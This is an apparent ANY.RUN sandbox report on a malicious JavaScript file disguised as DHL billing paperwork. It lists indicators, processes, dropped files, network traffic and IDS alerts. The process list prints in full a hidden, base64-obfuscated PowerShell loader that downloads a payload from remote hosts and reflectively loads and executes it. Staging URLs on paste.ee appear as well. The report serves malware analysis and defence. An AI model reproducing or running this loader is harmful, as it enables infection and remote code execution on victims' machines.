File name:

DHL BILLING ADDRESS REQUIREMENTS 20250511AA.js

Full analysis: https://app.any.run/tasks/467eac65-dc1e-41f2-8fee-830dbbd3bdb0
Verdict: Malicious activity
Analysis date: May 15, 2025, 14:38:33
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (452), with CRLF line terminators
MD5:

FD6547B9149E6A3CE91B1A96225EFB13

SHA1:

82E1C264E13CE628BC7B3147157EBA51887FF307

SHA256:

07B1CCC47B7C01C026A53788265F2018F215A70E4AD4870BE0DBE03AEDC172E1

SSDEEP:

48:hKNKqtkKHKOPK9aKwSK/K/KLKdKl+Kl+KLK6K0K/K+KhK+K+Kl+KvKl+KkJKtKvQ:hKNKq+KHKAKQKJK/K/KLKdKl+Kl+KLKu

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Base64-obfuscated command line is found

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 728)
      • wscript.exe (PID: 896)
      • wscript.exe (PID: 664)
      • powershell.exe (PID: 5576)

    • The process executes via Task Scheduler

      • wscript.exe (PID: 664)

  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 896)
      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Creates files in the program directory

      • cmd.exe (PID: 5344)

    • Reads the software policy settings

      • slui.exe (PID: 5164)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Disables trace logs

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 728)
      • powershell.exe (PID: 5576)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
147
Monitored processes
16
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs slui.exe no specs wscript.exe powershell.exe conhost.exe no specs cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
664"wscript.exe" C:\ProgramData\abbasi.jsC:\Windows\System32\wscript.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
728"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$presciences = 'JABhAGwAaQBuAGkAbgBnACAAPQAgACcAMAAvAHoAVQBKADIAUABWAEEAdQAvAGQALwBlAGUALgBlACMAcwBhAHAALwAvADoAcAAjACMAaAAnADsAJABCAG8AcgBvAGIAdQBkAHUAcgAgAD0AIAAkAGEAbABpAG4AaQBuAGcAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAHcAbwByAG0AaABvAGwAZQBzACAAPQAgACcAaAB0AHQAcABzADoALwAvAGEAcgBjAGgAaQB2AGUALgBvAHIAZwAvAGQAbwB3AG4AbABvAGEAZAAvAG4AZQB3AF8AaQBtAGEAZwBlAF8AMgAwADIANQAwADUAMAA5AF8AMQA4ADUAMgAvAG4AZQB3AF8AaQBtAGEAZwBlAC4AagBwAGcAJwA7ACQAYQB2AGEAcgBhAG0AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYQB2AGEAcgBhAG0ALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACcATQBvAHoAaQBsAGwAYQAvADUALgAwACcAKQA7ACQARgBpAGwAaQBwAGkAbgBhACAAPQAgACQAYQB2AGEAcgBhAG0ALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdwBvAHIAbQBoAG8AbABlAHMAKQA7ACQAdQBuAGQAZQByAHMAaQB0AHQAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQARgBpAGwAaQBwAGkAbgBhACkAOwAkAHQAcgBhAGMAaAB5AGMAYQByAHAAdQBzACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABpAG4AZgBhAHIAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABjAGkAcgBjAHUAbQBzAGEAaQBsACAAPQAgACQAdQBuAGQAZQByAHMAaQB0AHQAZQByAC4ASQBuAGQAZQB4AE8AZgAoACQAdAByAGEAYwBoAHkAYwBhAHIAcAB1AHMAKQA7ACQAbQBhAHkAYQBzACAAPQAgACQAdQBuAGQAZQByAHMAaQB0AHQAZQByAC4ASQBuAGQAZQB4AE8AZgAoACQAaQBuAGYAYQByAGUAKQA7ACQAYwBpAHIAYwB1AG0AcwBhAGkAbAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAG0AYQB5AGEAcwAgAC0AZwB0ACAAJABjAGkAcgBjAHUAbQBzAGEAaQBsADsAJABjAGkAcgBjAHUAbQBzAGEAaQBsACAAKwA9ACAAJAB0AHIAYQBjAGgAeQBjAGEAcgBwAHUAcwAuAEwAZQBuAGcAdABoADsAJABuAHUAYwBsAGUAYQByAGkAcwBhAHQAaQBvAG4AIAA9ACAAJABtAGEAeQBhAHMAIAAtACAAJABjAGkAcgBjAHUAbQBzAGEAaQBsADsAJABiAHUAcgBnAGgAYQBsACAAPQAgACQAdQBuAGQAZQByAHMAaQB0AHQAZQByAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGMAaQByAGMAdQBtAHMAYQBpAGwALAAgACQAbgB1AGMAbABlAGEAcgBpAHMAYQB0AGkAbwBuACkAOwAkAGcAbABvAG0AZQByAGkAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHUAcgBnAGgAYQBsACkAOwAkAHIAZQB1AHMAZQBhAGIAbABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGcAbABvAG0AZQByAGkAcwApADsAJABoAG8AbABsAG8AIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABCAG8AcgBvAGIAdQBkAHUAcgAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAMQAnACwAJwBjAG0AZAAnACwAJwAnACwAJwBoAHQAdABwAHMAOgAvAC8AbQBhAHIAdABhAGIAbABlAGMAaABlAGMAawBvAHUAdAAuAHMAaABvAHAALwAyADAAMgA1ADAAMwAvAGoAaQBqADIALgBqAHMAJwAsACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAsACcAYQBiAGIAYQBzAGkAJwAsACcAagBzACcALAAnADEAJwAsACcAMQAnACwAJwB0AHIAdQBuAGMAYQB0AHUAcgBlACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$parchmenty = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($presciences));Invoke-Expression $parchmenty;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
896"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\DHL BILLING ADDRESS REQUIREMENTS 20250511AA.js"C:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1164"C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
1228"C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967295
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2152C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
2852C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
3132"C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
c:\windows\syswow64\msvcrt.dll
4452"C:\Windows\SysWOW64\cmd.exe"C:\Windows\SysWOW64\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
4294967295
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
4920\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
13 141
Read events
13 140
Write events
1
Delete events
0

Modification events

(PID) Process:(896) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
66CA100000000000
Executable files
0
Suspicious files
2
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_turrkoef.1bp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5344cmd.exeC:\ProgramData\abbasi.jsbinary
MD5:F25A16D0B0724F50BF56EE62C48BDCDE
SHA256:AFB9179642579947E5008A39B487523D8D9C5DF433867D01FF7BF23CD4D8232C
728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_cq4pdzzd.5j1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
728powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5AA588F25153411B91DF180D7EC44177
SHA256:8A12A18AE3B85859BAB5265973568366DD71BC4B29FADB82A2A5465C38063330
5576powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_hyyiz5jk.3x1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5576powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1duuykgn.n4k.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
33
DNS requests
17
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.139:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
896
wscript.exe
GET
301
23.186.113.60:80
http://paste.ee/d/1JdU8Pgc/0
unknown
shared
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
728
powershell.exe
GET
301
23.186.113.60:80
http://paste.ee/d/uAVP2JUz/0
unknown
shared
6036
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6036
SIHClient.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5576
powershell.exe
GET
301
23.186.113.60:80
http://paste.ee/d/uAVP2JUz/0
unknown
shared
664
wscript.exe
GET
301
23.186.113.60:80
http://paste.ee/d/1JdU8Pgc/0
unknown
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.139:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
896
wscript.exe
23.186.113.60:80
paste.ee
shared
896
wscript.exe
23.186.113.60:443
paste.ee
shared
3216
svchost.exe
172.211.123.248:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.5:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 23.48.23.139
  • 23.48.23.148
  • 23.48.23.145
  • 23.48.23.195
  • 23.48.23.141
  • 23.48.23.143
  • 23.48.23.188
  • 23.48.23.135
  • 23.48.23.175
whitelisted
www.microsoft.com
  • 184.30.21.171
  • 2.23.246.101
whitelisted
paste.ee
  • 23.186.113.60
shared
client.wns.windows.com
  • 172.211.123.248
whitelisted
login.live.com
  • 20.190.160.5
  • 40.126.32.140
  • 20.190.160.130
  • 40.126.32.72
  • 40.126.32.133
  • 20.190.160.131
  • 20.190.160.20
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
archive.org
  • 207.241.224.2
whitelisted
dn721808.ca.archive.org
  • 204.62.247.90
whitelisted
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
slscr.update.microsoft.com
  • 52.149.20.212
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
896
wscript.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
728
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
664
wscript.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
5576
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
DHL BILLING ADDRESS REQUIREMENTS 20250511AA.js